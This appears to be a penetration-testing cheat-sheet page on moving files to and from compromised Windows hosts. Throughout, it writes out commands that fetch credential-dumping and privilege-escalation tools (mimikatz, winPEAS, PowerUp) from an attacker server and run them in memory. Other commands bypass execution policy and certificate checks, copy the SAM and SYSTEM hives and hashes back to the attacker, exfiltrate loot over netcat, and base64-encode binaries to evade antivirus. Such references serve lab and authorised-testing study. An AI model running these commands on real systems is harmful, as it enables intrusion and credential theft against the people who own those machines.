> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# File Transfer

> File transfer techniques for Windows targets: HTTP, SMB, Netcat, and Base64 encoding for restricted environments.

## HTTP (TCP 80)

### Python Web Server (Attacker)

```bash theme={"dark"}
python3 -m http.server 80
```

***

### PowerShell: Invoke-WebRequest

```powershell theme={"dark"}
powershell -c "iwr http://10.10.10.10/nc.exe -OutFile C:\Windows\Temp\nc.exe"
powershell -c "iwr http://10.10.10.10/mimikatz.exe -OutFile mimikatz.exe"
powershell -c "iwr http://10.10.10.10/winPEAS.exe -OutFile winPEAS.exe"
```

Execute in memory:

```powershell theme={"dark"}
powershell -ep bypass -c "iex(iwr http://10.10.10.10/powerup.ps1 -UseBasicParsing)"
```

***

### PowerShell: WebClient (Stealthier)

```powershell theme={"dark"}
powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.10.10/nc.exe','nc.exe')"
powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.10.10/mimikatz.exe','mimikatz.exe')"
```

***

### Certutil (CMD LOLBIN)

```shellscript theme={"dark"}
certutil -urlcache -split -f http://10.10.10.10/nc.exe nc.exe
certutil -urlcache -split -f http://10.10.10.10/mimikatz.exe mimikatz.exe
certutil -urlcache -split -f http://10.10.10.10/winPEAS.exe winPEAS.exe
```

***

## SMB (TCP 139 / 445)

### Attacker

```bash theme={"dark"}
impacket-smbserver share . -smb2support
```

***

### Victim Download

```cmd theme={"dark"}
copy \\10.10.10.10\share\nc.exe nc.exe
copy \\10.10.10.10\share\mimikatz.exe mimikatz.exe
copy \\10.10.10.10\share\winPEAS.exe winPEAS.exe
```

PowerShell:

```powershell theme={"dark"}
New-PSDrive -Name p -PSProvider FileSystem -Root \\10.10.10.10\share
copy p:\nc.exe .
copy p:\mimikatz.exe .
```

***

### Upload Loot

```cmd theme={"dark"}
copy SAM \\10.10.10.10\share\
copy SYSTEM \\10.10.10.10\share\
copy hashes.txt \\10.10.10.10\share\
```

***

## HTTPS (TCP 443)

### Attacker

```bash theme={"dark"}
# python's http.server is plaintext (no TLS until 3.14) — wrap it with ssl for real HTTPS
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 7 -nodes -subj "/CN=lab"
python3 -c 'import http.server,ssl;h=http.server.HTTPServer(("0.0.0.0",443),http.server.SimpleHTTPRequestHandler);c=ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER);c.load_cert_chain("cert.pem","key.pem");h.socket=c.wrap_socket(h.socket,server_side=True);h.serve_forever()'
```

### Victim

```powershell theme={"dark"}
# self-signed cert → bypass validation
powershell -c "[Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; iwr https://10.10.10.10/nc.exe -OutFile nc.exe"
```

***

## Netcat Raw Transfer (TCP 4444)

### Upload to victim (push)

Attacker:

```bash theme={"dark"}
nc -lvnp 4444 < mimikatz.exe
```

Victim:

```cmd theme={"dark"}
nc 10.10.10.10 4444 > mimikatz.exe
```

***

### Download from victim (exfil)

Attacker:

```bash theme={"dark"}
nc -lvnp 4444 > loot.zip
```

Victim:

```cmd theme={"dark"}
nc 10.10.10.10 4444 < C:\Users\Public\loot.zip
```

***

## Base64 Transfer (AV Evasion / Restricted Shell)

### Attacker

```bash theme={"dark"}
base64 mimikatz.exe > mimikatz.b64
```

Serve:

```bash theme={"dark"}
python3 -m http.server 80
```

### Victim

```cmd theme={"dark"}
certutil -urlcache -f http://10.10.10.10/mimikatz.b64 mimikatz.b64
certutil -decode mimikatz.b64 mimikatz.exe
```
